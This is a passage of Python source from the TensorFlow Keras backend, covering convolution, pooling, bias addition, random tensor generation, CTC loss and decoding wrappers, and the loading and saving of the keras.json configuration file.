else:
tf_data_format = 'NCHW'
return x, tf_data_format
def _preprocess_conv3d_input(x, data_format):
"""Transpose and cast the input before the conv3d.
Arguments:
x: input tensor.
data_format: string, `"channels_last"` or `"channels_first"`.
Returns:
A tensor.
"""
tf_data_format = 'NDHWC'
if data_format == 'channels_first':
if not _has_nchw_support():
x = array_ops.transpose(x, (0, 2, 3, 4, 1))
else:
tf_data_format = 'NCDHW'
return x, tf_data_format
def _preprocess_padding(padding):
"""Convert keras' padding to TensorFlow's padding.
Arguments:
padding: string, one of 'same', 'valid'.
Returns:
a string, one of 'SAME', 'VALID'.
Raises:
ValueError: if `padding` is invalid.
"""
if padding == 'same':
padding = 'SAME'
elif padding == 'valid':
padding = 'VALID'
else:
raise ValueError('Invalid padding: ' + str(padding))
return padding
@keras_export('keras.backend.conv1d')
def conv1d(x,
kernel,
strides=1,
padding='valid',
data_format=None,
dilation_rate=1):
"""1D convolution.
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
strides: stride integer.
padding: string, `"same"`, `"causal"` or `"valid"`.
data_format: string, one of "channels_last", "channels_first".
dilation_rate: integer dilate rate.
Returns:
A tensor, result of 1D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
kernel_shape = kernel.shape.as_list()
if padding == 'causal':
# causal (dilated) convolution:
left_pad = dilation_rate * (kernel_shape[0] - 1)
x = temporal_padding(x, (left_pad, 0))
padding = 'valid'
padding = _preprocess_padding(padding)
x, tf_data_format = _preprocess_conv1d_input(x, data_format)
x = nn.convolution(
input=x,
filter=kernel,
dilation_rate=dilation_rate,
strides=strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NWC':
x = array_ops.transpose(x, (0, 2, 1)) # NWC -> NCW
return x
@keras_export('keras.backend.conv2d')
def conv2d(x,
kernel,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D convolution.
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
strides: strides tuple.
padding: string, `"same"` or `"valid"`.
data_format: `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow data format
for inputs/kernels/outputs.
dilation_rate: tuple of 2 integers.
Returns:
A tensor, result of 2D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
x = nn.convolution(
input=x,
filter=kernel,
dilation_rate=dilation_rate,
strides=strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
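# Illustrative sketch (hypothetical helper): a 'same'-padded 3x3 convolution
# over one 8x8 single-channel image, with the kernel laid out as
# (height, width, in_channels, out_channels).
def _example_conv2d_usage():
  image = constant_op.constant(np.ones((1, 8, 8, 1), dtype=np.float32))
  kernel = constant_op.constant(np.ones((3, 3, 1, 4), dtype=np.float32))
  return conv2d(image, kernel, strides=(1, 1), padding='same',
                data_format='channels_last')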
@keras_export('keras.backend.conv2d_transpose')
def conv2d_transpose(x,
kernel,
output_shape,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D deconvolution (i.e.
transposed convolution).
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
output_shape: 1D int tensor for the output shape.
strides: strides tuple.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow/CNTK data format
for inputs/kernels/outputs.
dilation_rate: Tuple of 2 integers.
Returns:
A tensor, result of transposed 2D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if isinstance(output_shape, (tuple, list)):
output_shape = array_ops.stack(output_shape)
# `atrous_conv2d_transpose` only supports NHWC format, even on GPU.
if data_format == 'channels_first' and dilation_rate != (1, 1):
force_transpose = True
else:
force_transpose = False
x, tf_data_format = _preprocess_conv2d_input(x, data_format, force_transpose)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
output_shape = (output_shape[0], output_shape[2], output_shape[3],
output_shape[1])
if output_shape[0] is None:
output_shape = (array_ops.shape(x)[0],) + tuple(output_shape[1:])
output_shape = array_ops.stack(list(output_shape))
padding = _preprocess_padding(padding)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
if dilation_rate == (1, 1):
x = nn.conv2d_transpose(x, kernel, output_shape, strides,
padding=padding,
data_format=tf_data_format)
else:
assert dilation_rate[0] == dilation_rate[1]
x = nn.atrous_conv2d_transpose(
x,
kernel,
output_shape,
rate=dilation_rate[0],
padding=padding)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
def separable_conv1d(x,
depthwise_kernel,
pointwise_kernel,
strides=1,
padding='valid',
data_format=None,
dilation_rate=1):
"""1D convolution with separable filters.
Arguments:
x: input tensor
depthwise_kernel: convolution kernel for the depthwise convolution.
pointwise_kernel: kernel for the 1x1 convolution.
strides: stride integer.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
dilation_rate: integer dilation rate.
Returns:
Output tensor.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if isinstance(strides, int):
strides = (strides,)
if isinstance(dilation_rate, int):
dilation_rate = (dilation_rate,)
x, tf_data_format = _preprocess_conv1d_input(x, data_format)
padding = _preprocess_padding(padding)
if not isinstance(strides, tuple):
strides = tuple(strides)
if tf_data_format == 'NWC':
spatial_start_dim = 1
strides = (1,) + strides * 2 + (1,)
else:
spatial_start_dim = 2
strides = (1, 1) + strides * 2
x = array_ops.expand_dims(x, spatial_start_dim)
depthwise_kernel = array_ops.expand_dims(depthwise_kernel, 0)
pointwise_kernel = array_ops.expand_dims(pointwise_kernel, 0)
dilation_rate = (1,) + dilation_rate
x = nn.separable_conv2d(
x,
depthwise_kernel,
pointwise_kernel,
strides=strides,
padding=padding,
rate=dilation_rate,
data_format=tf_data_format)
x = array_ops.squeeze(x, [spatial_start_dim])
if data_format == 'channels_first' and tf_data_format == 'NWC':
x = array_ops.transpose(x, (0, 2, 1)) # NWC -> NCW
return x
@keras_export('keras.backend.separable_conv2d')
def separable_conv2d(x,
depthwise_kernel,
pointwise_kernel,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D convolution with separable filters.
Arguments:
x: input tensor
depthwise_kernel: convolution kernel for the depthwise convolution.
pointwise_kernel: kernel for the 1x1 convolution.
strides: strides tuple (length 2).
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
dilation_rate: tuple of integers,
dilation rates for the separable convolution.
Returns:
Output tensor.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
ValueError: if `strides` is not a tuple of 2 integers.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if len(strides) != 2:
raise ValueError('`strides` must be a tuple of 2 integers.')
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
if not isinstance(strides, tuple):
strides = tuple(strides)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
x = nn.separable_conv2d(
x,
depthwise_kernel,
pointwise_kernel,
strides=strides,
padding=padding,
rate=dilation_rate,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
def depthwise_conv2d(x,
depthwise_kernel,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D convolution with separable filters.
Arguments:
x: input tensor
depthwise_kernel: convolution kernel for the depthwise convolution.
strides: strides tuple (length 2).
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
dilation_rate: tuple of integers,
dilation rates for the separable convolution.
Returns:
Output tensor.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
x = nn.depthwise_conv2d(
x,
depthwise_kernel,
strides=strides,
padding=padding,
rate=dilation_rate,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
@keras_export('keras.backend.conv3d')
def conv3d(x,
kernel,
strides=(1, 1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1, 1)):
"""3D convolution.
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
strides: strides tuple.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow/CNTK data format
for inputs/kernels/outputs.
dilation_rate: tuple of 3 integers.
Returns:
A tensor, result of 3D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv3d_input(x, data_format)
padding = _preprocess_padding(padding)
x = nn.convolution(
input=x,
filter=kernel,
dilation_rate=dilation_rate,
strides=strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
x = array_ops.transpose(x, (0, 4, 1, 2, 3))
return x
def conv3d_transpose(x,
kernel,
output_shape,
strides=(1, 1, 1),
padding='valid',
data_format=None):
"""3D deconvolution (i.e.
transposed convolution).
Arguments:
x: input tensor.
kernel: kernel tensor.
output_shape: 1D int tensor for the output shape.
strides: strides tuple.
padding: string, "same" or "valid".
data_format: string, `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow/CNTK data format
for inputs/kernels/outputs.
Returns:
A tensor, result of transposed 3D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` nor
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if isinstance(output_shape, (tuple, list)):
output_shape = array_ops.stack(output_shape)
x, tf_data_format = _preprocess_conv3d_input(x, data_format)
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
output_shape = (output_shape[0], output_shape[2], output_shape[3],
output_shape[4], output_shape[1])
if output_shape[0] is None:
output_shape = (array_ops.shape(x)[0],) + tuple(output_shape[1:])
output_shape = array_ops.stack(list(output_shape))
padding = _preprocess_padding(padding)
if tf_data_format == 'NDHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
x = nn.conv3d_transpose(
x,
kernel,
output_shape,
strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
x = array_ops.transpose(x, (0, 4, 1, 2, 3))
return x
@keras_export('keras.backend.pool2d')
def pool2d(x,
pool_size,
strides=(1, 1),
padding='valid',
data_format=None,
pool_mode='max'):
"""2D Pooling.
Arguments:
x: Tensor or variable.
pool_size: tuple of 2 integers.
strides: tuple of 2 integers.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
pool_mode: string, `"max"` or `"avg"`.
Returns:
A tensor, result of 2D pooling.
Raises:
ValueError: if `data_format` is neither `"channels_last"` nor
`"channels_first"`.
ValueError: if `pool_size` is not a tuple of 2 integers.
ValueError: if `strides` is not a tuple of 2 integers.
ValueError: if `pool_mode` is neither `"max"` nor `"avg"`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if len(pool_size) != 2:
raise ValueError('`pool_size` must be a tuple of 2 integers.')
if len(strides) != 2:
raise ValueError('`strides` must be a tuple of 2 integers.')
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
pool_size = (1,) + pool_size + (1,)
else:
strides = (1, 1) + strides
pool_size = (1, 1) + pool_size
if pool_mode == 'max':
x = nn.max_pool(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
elif pool_mode == 'avg':
x = nn.avg_pool(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
else:
raise ValueError('Invalid pooling mode: ' + str(pool_mode))
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
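# Illustrative sketch (hypothetical helper): 2x2 max pooling with stride 2 on
# a channels_last input tensor.
def _example_pool2d_usage():
  x = constant_op.constant(np.ones((1, 8, 8, 3), dtype=np.float32))
  return pool2d(x, pool_size=(2, 2), strides=(2, 2), padding='valid',
                data_format='channels_last', pool_mode='max')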
@keras_export('keras.backend.pool3d')
def pool3d(x,
pool_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
pool_mode='max'):
"""3D Pooling.
Arguments:
x: Tensor or variable.
pool_size: tuple of 3 integers.
strides: tuple of 3 integers.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
pool_mode: string, `"max"` or `"avg"`.
Returns:
A tensor, result of 3D pooling.
Raises:
ValueError: if `data_format` is neither `"channels_last"` nor
`"channels_first"`.
ValueError: if `pool_mode` is neither `"max"` nor `"avg"`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv3d_input(x, data_format)
padding = _preprocess_padding(padding)
if tf_data_format == 'NDHWC':
strides = (1,) + strides + (1,)
pool_size = (1,) + pool_size + (1,)
else:
strides = (1, 1) + strides
pool_size = (1, 1) + pool_size
if pool_mode == 'max':
x = nn.max_pool3d(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
elif pool_mode == 'avg':
x = nn.avg_pool3d(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
else:
raise ValueError('Invalid pooling mode: ' + str(pool_mode))
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
x = array_ops.transpose(x, (0, 4, 1, 2, 3))
return x
def local_conv(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format=None):
"""Apply N-D convolution with un-shared weights.
Arguments:
inputs: (N+2)-D tensor with shape
(batch_size, channels_in, d_in1, ..., d_inN)
if data_format='channels_first', or
(batch_size, d_in1, ..., d_inN, channels_in)
if data_format='channels_last'.
kernel: the unshared weight for N-D convolution,
with shape (output_items, feature_dim, channels_out), where
feature_dim = np.prod(kernel_size) * channels_in,
output_items = np.prod(output_shape).
kernel_size: a tuple of N integers, specifying the
spatial dimensions of the N-D convolution window.
strides: a tuple of N integers, specifying the strides
of the convolution along the spatial dimensions.
output_shape: a tuple of (d_out1, ..., d_outN) specifying the spatial
dimensionality of the output.
data_format: string, "channels_first" or "channels_last".
Returns:
An (N+2)-D tensor with shape:
(batch_size, channels_out) + output_shape
if data_format='channels_first', or:
(batch_size,) + output_shape + (channels_out,)
if data_format='channels_last'.
Raises:
ValueError: if `data_format` is neither
`channels_last` nor `channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
kernel_shape = int_shape(kernel)
feature_dim = kernel_shape[1]
channels_out = kernel_shape[-1]
ndims = len(output_shape)
spatial_dimensions = list(range(ndims))
xs = []
output_axes_ticks = [range(axis_max) for axis_max in output_shape]
for position in itertools.product(*output_axes_ticks):
slices = [slice(None)]
if data_format == 'channels_first':
slices.append(slice(None))
slices.extend([slice(position[d] * strides[d],
position[d] * strides[d] + kernel_size[d])
for d in spatial_dimensions])
if data_format == 'channels_last':
slices.append(slice(None))
xs.append(reshape(inputs[slices], (1, -1, feature_dim)))
x_aggregate = concatenate(xs, axis=0)
output = batch_dot(x_aggregate, kernel)
output = reshape(output, output_shape + (-1, channels_out))
if data_format == 'channels_first':
permutation = [ndims, ndims + 1] + spatial_dimensions
else:
permutation = [ndims] + spatial_dimensions + [ndims + 1]
return permute_dimensions(output, permutation)
@keras_export('keras.backend.local_conv1d')
def local_conv1d(inputs, kernel, kernel_size, strides, data_format=None):
"""Apply 1D conv with un-shared weights.
Arguments:
inputs: 3D tensor with shape:
(batch_size, steps, input_dim)
if data_format is "channels_last" or
(batch_size, input_dim, steps)
if data_format is "channels_first".
kernel: the unshared weight for convolution,
with shape (output_length, feature_dim, filters).
kernel_size: a tuple of a single integer,
specifying the length of the 1D convolution window.
strides: a tuple of a single integer,
specifying the stride length of the convolution.
data_format: the data format, channels_first or channels_last.
Returns:
A 3D tensor with shape:
(batch_size, filters, output_length)
if data_format='channels_first'
or a 3D tensor with shape:
(batch_size, output_length, filters)
if data_format='channels_last'.
"""
output_shape = (kernel.shape[0],)
return local_conv(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format)
@keras_export('keras.backend.local_conv2d')
def local_conv2d(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format=None):
"""Apply 2D conv with un-shared weights.
Arguments:
inputs: 4D tensor with shape:
(batch_size, filters, new_rows, new_cols)
if data_format='channels_first'
or 4D tensor with shape:
(batch_size, new_rows, new_cols, filters)
if data_format='channels_last'.
kernel: the unshared weight for convolution,
with shape (output_items, feature_dim, filters).
kernel_size: a tuple of 2 integers, specifying the
width and height of the 2D convolution window.
strides: a tuple of 2 integers, specifying the strides
of the convolution along the width and height.
output_shape: a tuple with (output_row, output_col).
data_format: the data format, channels_first or channels_last.
Returns:
A 4D tensor with shape:
(batch_size, filters, new_rows, new_cols)
if data_format='channels_first'
or 4D tensor with shape:
(batch_size, new_rows, new_cols, filters)
if data_format='channels_last'.
"""
return local_conv(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format)
@keras_export('keras.backend.bias_add')
def bias_add(x, bias, data_format=None):
"""Adds a bias vector to a tensor.
Arguments:
x: Tensor or variable.
bias: Bias tensor to add.
data_format: string, `"channels_last"` or `"channels_first"`.
Returns:
Output tensor.
Raises:
ValueError: In one of the two cases below:
1. invalid `data_format` argument.
2. invalid bias shape.
the bias should be either a vector or
a tensor with ndim(x) - 1 dimensions.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
bias_shape = int_shape(bias)
if len(bias_shape) != 1 and len(bias_shape) != ndim(x) - 1:
raise ValueError(
'Unexpected bias dimensions %d, expected 1 or %d dimensions' %
(len(bias_shape), ndim(x) - 1))
# pylint: disable=g-no-augmented-assignment
if ndim(x) == 5:
if data_format == 'channels_first':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, bias_shape[0], 1, 1, 1))
else:
x = x + reshape(bias, (1, bias_shape[3]) + bias_shape[:3])
elif data_format == 'channels_last':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, 1, 1, bias_shape[0]))
else:
x = x + reshape(bias, (1,) + bias_shape)
elif ndim(x) == 4:
if data_format == 'channels_first':
if len(bias_shape) == 1:
if _has_nchw_support():
x = nn.bias_add(x, bias, data_format='NCHW')
else:
x = x + reshape(bias, (1, bias_shape[0], 1, 1))
else:
x = x + reshape(bias, (1, bias_shape[2]) + bias_shape[:2])
elif data_format == 'channels_last':
if len(bias_shape) == 1:
x = nn.bias_add(x, bias, data_format='NHWC')
else:
x = x + reshape(bias, (1,) + bias_shape)
elif ndim(x) == 3:
if data_format == 'channels_first':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, bias_shape[0], 1))
else:
x = x + reshape(bias, (1, bias_shape[1], bias_shape[0]))
elif data_format == 'channels_last':
if len(bias_shape) == 1:
x = x + reshape(bias, (1, 1, bias_shape[0]))
else:
x = x + reshape(bias, (1,) + bias_shape)
else:
x = nn.bias_add(x, bias)
# pylint: enable=g-no-augmented-assignment
return x
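# Illustrative sketch (hypothetical helper): adding a per-channel bias vector
# to a 4D channels_last activation tensor.
def _example_bias_add_usage():
  x = constant_op.constant(np.zeros((2, 5, 5, 3), dtype=np.float32))
  bias = constant_op.constant(np.array([0.1, 0.2, 0.3], dtype=np.float32))
  return bias_add(x, bias, data_format='channels_last')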
# RANDOMNESS
@keras_export('keras.backend.random_normal')
def random_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None):
"""Returns a tensor with normal distribution of values.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
mean: A float, mean of the normal distribution to draw samples.
stddev: A float, standard deviation of the normal distribution
to draw samples.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return random_ops.random_normal(
shape, mean=mean, stddev=stddev, dtype=dtype, seed=seed)
@keras_export('keras.backend.random_uniform')
def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None):
"""Returns a tensor with uniform distribution of values.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
minval: A float, lower boundary of the uniform distribution
to draw samples.
maxval: A float, upper boundary of the uniform distribution
to draw samples.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return random_ops.random_uniform(
shape, minval=minval, maxval=maxval, dtype=dtype, seed=seed)
@keras_export('keras.backend.random_binomial')
def random_binomial(shape, p=0.0, dtype=None, seed=None):
"""Returns a tensor with random binomial distribution of values.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
p: A float, `0. <= p <= 1`, probability of binomial distribution.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return array_ops.where(
random_ops.random_uniform(shape, dtype=dtype, seed=seed) <= p,
array_ops.ones(shape, dtype=dtype), array_ops.zeros(shape, dtype=dtype))
@keras_export('keras.backend.truncated_normal')
def truncated_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None):
"""Returns a tensor with truncated random normal distribution of values.
The generated values follow a normal distribution
with specified mean and standard deviation,
except that values whose magnitude is more than
two standard deviations from the mean are dropped and re-picked.
Arguments:
shape: A tuple of integers, the shape of tensor to create.
mean: Mean of the values.
stddev: Standard deviation of the values.
dtype: String, dtype of returned tensor.
seed: Integer, random seed.
Returns:
A tensor.
"""
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(10e6)
return random_ops.truncated_normal(
shape, mean, stddev, dtype=dtype, seed=seed)
# CTC
# TensorFlow has a native implementation, but it uses sparse tensors
# and therefore requires a wrapper for Keras. The functions below convert
# dense to sparse tensors and also wrap up the beam search code that is
# in TensorFlow's CTC implementation.
@keras_export('keras.backend.ctc_label_dense_to_sparse')
def ctc_label_dense_to_sparse(labels, label_lengths):
"""Converts CTC labels from dense to sparse.
Arguments:
labels: dense CTC labels.
label_lengths: length of the labels.
Returns:
A sparse tensor representation of the labels.
"""
label_shape = array_ops.shape(labels)
num_batches_tns = array_ops.stack([label_shape[0]])
max_num_labels_tns = array_ops.stack([label_shape[1]])
def range_less_than(_, current_input):
return array_ops.expand_dims(
math_ops.range(label_shape[1]), 0) < array_ops.fill(
max_num_labels_tns, current_input)
init = math_ops.cast(
array_ops.fill([1, label_shape[1]], 0), dtypes_module.bool)
dense_mask = functional_ops.scan(
range_less_than, label_lengths, initializer=init, parallel_iterations=1)
dense_mask = dense_mask[:, 0, :]
label_array = array_ops.reshape(
array_ops.tile(math_ops.range(0, label_shape[1]), num_batches_tns),
label_shape)
label_ind = array_ops.boolean_mask(label_array, dense_mask)
batch_array = array_ops.transpose(
array_ops.reshape(
array_ops.tile(math_ops.range(0, label_shape[0]), max_num_labels_tns),
reverse(label_shape, 0)))
batch_ind = array_ops.boolean_mask(batch_array, dense_mask)
indices = array_ops.transpose(
array_ops.reshape(concatenate([batch_ind, label_ind], axis=0), [2, -1]))
vals_sparse = array_ops.gather_nd(labels, indices)
return sparse_tensor.SparseTensor(
math_ops.cast(indices, dtypes_module.int64), vals_sparse,
math_ops.cast(label_shape, dtypes_module.int64))
@keras_export('keras.backend.ctc_batch_cost')
def ctc_batch_cost(y_true, y_pred, input_length, label_length):
"""Runs CTC loss algorithm on each batch element.
Arguments:
y_true: tensor `(samples, max_string_length)`
containing the truth labels.
y_pred: tensor `(samples, time_steps, num_categories)`
containing the prediction, or output of the softmax.
input_length: tensor `(samples, 1)` containing the sequence length for
each batch item in `y_pred`.
label_length: tensor `(samples, 1)` containing the sequence length for
each batch item in `y_true`.
Returns:
Tensor with shape (samples, 1) containing the
CTC loss of each element.
"""
label_length = math_ops.cast(
array_ops.squeeze(label_length, axis=-1), dtypes_module.int32)
input_length = math_ops.cast(
array_ops.squeeze(input_length, axis=-1), dtypes_module.int32)
sparse_labels = math_ops.cast(
ctc_label_dense_to_sparse(y_true, label_length), dtypes_module.int32)
y_pred = math_ops.log(array_ops.transpose(y_pred, perm=[1, 0, 2]) + epsilon())
return array_ops.expand_dims(
ctc.ctc_loss(
inputs=y_pred, labels=sparse_labels, sequence_length=input_length), 1)
@keras_export('keras.backend.ctc_decode')
def ctc_decode(y_pred, input_length, greedy=True, beam_width=100, top_paths=1):
"""Decodes the output of a softmax.
Can use either greedy search (also known as best path)
or a constrained dictionary search.
Arguments:
y_pred: tensor `(samples, time_steps, num_categories)`
containing the prediction, or output of the softmax.
input_length: tensor `(samples, )` containing the sequence length for
each batch item in `y_pred`.
greedy: perform much faster best-path search if `true`.
This does not use a dictionary.
beam_width: if `greedy` is `false`: a beam search decoder will be used
with a beam of this width.
top_paths: if `greedy` is `false`,
how many of the most probable paths will be returned.
Returns:
Tuple:
List: if `greedy` is `true`, returns a list of one element that
contains the decoded sequence.
If `false`, returns the `top_paths` most probable
decoded sequences.
Important: blank labels are returned as `-1`.
Tensor `(top_paths, )` that contains
the log probability of each decoded sequence.
"""
y_pred = math_ops.log(array_ops.transpose(y_pred, perm=[1, 0, 2]) + epsilon())
input_length = math_ops.cast(input_length, dtypes_module.int32)
if greedy:
(decoded, log_prob) = ctc.ctc_greedy_decoder(
inputs=y_pred, sequence_length=input_length)
else:
(decoded, log_prob) = ctc.ctc_beam_search_decoder(
inputs=y_pred,
sequence_length=input_length,
beam_width=beam_width,
top_paths=top_paths)
decoded_dense = [
sparse_ops.sparse_to_dense(
st.indices, st.dense_shape, st.values, default_value=-1)
for st in decoded
]
return (decoded_dense, log_prob)
# HIGH ORDER FUNCTIONS
@keras_export('keras.backend.map_fn')
def map_fn(fn, elems, name=None, dtype=None):
"""Map the function fn over the elements elems and return the outputs.
Arguments:
fn: Callable that will be called upon each element in elems
elems: tensor
name: A string name for the map node in the graph
dtype: Output data type.
Returns:
Tensor with dtype `dtype`.
"""
return map_fn_lib.map_fn(fn, elems, name=name, dtype=dtype)
@keras_export('keras.backend.foldl')
def foldl(fn, elems, initializer=None, name=None):
"""Reduce elems using fn to combine them from left to right.
Arguments:
fn: Callable that will be called upon each element in elems and an
accumulator, for instance `lambda acc, x: acc + x`
elems: tensor
initializer: The first value used (`elems[0]` in case of None)
name: A string name for the foldl node in the graph
Returns:
Tensor with same type and shape as `initializer`.
"""
return functional_ops.foldl(fn, elems, initializer=initializer, name=name)
@keras_export('keras.backend.foldr')
def foldr(fn, elems, initializer=None, name=None):
"""Reduce elems using fn to combine them from right to left.
Arguments:
fn: Callable that will be called upon each element in elems and an
accumulator, for instance `lambda acc, x: acc + x`
elems: tensor
initializer: The first value used (`elems[-1]` in case of None)
name: A string name for the foldr node in the graph
Returns:
Same type and shape as initializer
"""
return functional_ops.foldr(fn, elems, initializer=initializer, name=name)
# Load Keras default configuration from config file if present.
# Set Keras base dir path given KERAS_HOME env variable, if applicable.
# Otherwise either ~/.keras or /tmp.
if 'KERAS_HOME' in os.environ:
_keras_dir = os.environ.get('KERAS_HOME')
else:
_keras_base_dir = os.path.expanduser('~')
_keras_dir = os.path.join(_keras_base_dir, '.keras')
_config_path = os.path.expanduser(os.path.join(_keras_dir, 'keras.json'))
if os.path.exists(_config_path):
try:
_config = json.load(open(_config_path))
except ValueError:
_config = {}
_floatx = _config.get('floatx', floatx())
assert _floatx in {'float16', 'float32', 'float64'}
_epsilon = _config.get('epsilon', epsilon())
assert isinstance(_epsilon, float)
_image_data_format = _config.get('image_data_format', image_data_format())
assert _image_data_format in {'channels_last', 'channels_first'}
set_floatx(_floatx)
set_epsilon(_epsilon)
set_image_data_format(_image_data_format)
# Save config file.
if not os.path.exists(_keras_dir):
try:
os.makedirs(_keras_dir)
except OSError:
    # Ignore permission-denied errors and potential race conditions
    # in multi-threaded environments.
pass
if not os.path.exists(_config_path):
_config = {
'floatx': floatx(),
'epsilon': epsilon(),
'backend': 'tensorflow',
'image_data_format': image_data_format()
}
try:
with open(_config_path, 'w') as f:
f.write(json.dumps(_config, indent=4))
except IOError:
